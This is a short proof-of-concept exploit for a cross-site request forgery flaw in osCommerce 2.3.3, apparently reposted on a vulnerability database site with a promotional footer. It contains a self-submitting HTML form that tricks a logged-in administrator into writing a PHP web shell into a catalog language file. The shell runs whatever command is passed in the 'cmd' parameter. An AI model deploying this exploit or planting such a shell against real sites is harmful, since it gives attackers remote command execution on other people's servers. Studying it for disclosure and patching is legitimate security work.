Proof Of Concept CSRF in osCommerce 2.3.
`<?php
/*
* this is simple proof-of-c0ncept for csrf in latest
osCommerce (2.3.3).
*
* Admin, after visiting this page, will add php-shell-code to file:
* ./catalog/includes/languages/english/download.php, so now if we
* add 'cmd' param to this file, our 'shell' will print command output.
*
* --- there should be more this kind of bugs in this webapp.
* 22.o1.2o13 o/
*/
?>
<html><body onload="document.runCSRF.submit();">
<form method="post" name="runCSRF"
action="http://oscommerce-2.3.3/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">
<input type="hidden" name="file_contents"
value="<?php $cmd = $_GET['cmd']; echo '<pre>' . shell_exec($cmd) . '</pre>'; ?>">
</form>your shell should be here:
catalog/includes/languages/english/download.php?cmd=id<br></body></html>
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo